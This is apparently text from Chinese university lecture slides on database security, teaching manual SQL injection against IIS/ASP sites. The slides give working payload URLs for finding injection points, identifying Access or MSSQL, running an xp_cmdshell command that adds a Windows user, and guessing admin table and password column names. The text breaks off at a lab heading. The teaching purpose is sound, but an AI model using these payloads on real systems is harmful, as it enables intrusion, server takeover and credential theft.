网络安全第六讲数据库安全实例sql注入.pptVIP

手工注射-注射点类型 http://xxx.xxx.xxx/abc.asp?id=YY在页面执行中的含义： 当YY为整型参数时 当输入的参数YY为整型时，通常abc.asp中SQL语句原貌大致如下：select * from 表名 where id=YY 当YY为字符串型参数时 当输入的参数YY为字符串时，通常abc.asp中SQL语句原貌大致如下：select * from 表名 where id=YY 注意:不做特殊说明时所有参数均为整型参数,所有字符均在英文输入法状态下输入,并且站点结构为IIS+asp 判断当前url是否为注射点 参数为字符串型参数时如何判断(YY为字符串型参数) http://xxx.xxx.xxx/abc.asp?id=YY’ (单引号) abc.asp运行异常； http://xxx.xxx.xxx/abc.asp?id=YY and 1=1 abc.asp运行正常，而且与HTTP://xxx.xxx.xxx/abc.asp?id=YY’运行结果相同 http://xxx.xxx.xxx/abc.asp?id=YY and 1=2 abc.asp运行异常； 如果以上三步满足，abc.asp中一定存在SQL注入漏洞。那么http://xxx.xxx.xxx/abc.asp?id=YY就是一个注射点 判断数据库类型 利用单引号判断Access /showdetail.asp?id=49，我们在这个地址后面加上单引号’，服务器会返回下面的错误提示：Microsoft JET Database Engine 错误 80040e14字符串的语法错误 在查询表达式 ID=49 中。/showdetail.asp，行8 我们可以得出网站使用的是Access数据库，通过JET引擎连接数据库，而不是通过ODBC (mssql所用). 判断数据库类型cont. 利用单引号判断Mssql /zrxx.asp?id=49，我们在这个地址后面加上单引号’服务器会返回下面的错误提示： Microsoft OLE DB Provider for ODBC Drivers 错误 80040e21 ODBC 驱动程序不支持所需的属性。 /zrxx.asp，行 97 这就是使用Mssql数据库的站点了 判断数据库类型cont. 利用系统表 ACCESS的系统表是msysobjects,且在WEB环境下没有访问权限，而MS-SQL的系统表是sysobjects,在WEB环境下有访问权限。对于以下两条语句：1、/abc.asp?id=YY and (select count(*) from sysobjects)02、/abc.asp?id=YY and (select count(*) from msysobjects)0 注：若数据库是MS-SQL，则第一条一定运行正常， 第二条则异常； 若是ACCESS则两条都会异常。 确定XP_CMDSHELL执行情况 HTTP://xxx.xxx.xxx/abc.asp?id=YY and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell) 判断XP_CMDSHELL是否存在,返回正常则存在. HTTP://xxx.xxx.xxx/abc.asp?id=YY exec master..xp_cmdshell’net user 123 123/add’;-- 增加一个用户123,密码也为123,此处可使用任何NET命令。 注：此处注射必须要在Mssql下有SA权限,所以一旦成功可以直取服务器最高权限，不过成功率很低. 猜解表名和字段名 针对Access数据库 ….abc.asp?id=YY and 0(select count(*) from admin) ---判断是否存在admin这张表 ….abc.asp?id=YY and 0(select count(username) from admin) ---判断是否存在username这个字段 ….abc.asp?id=YY and 0(select count(password) from admin) ---判断是否存在password这个字段 注意：如果上面两条注入语句返回正常就说明存在表名和字段名,否则根 据常用表名和字段名多次更改和判断,这里只能凭借猜解运气. 常用表名和字段名在明小子—SQL注入—设置检测区中可以找到 实验: IIS+ASP+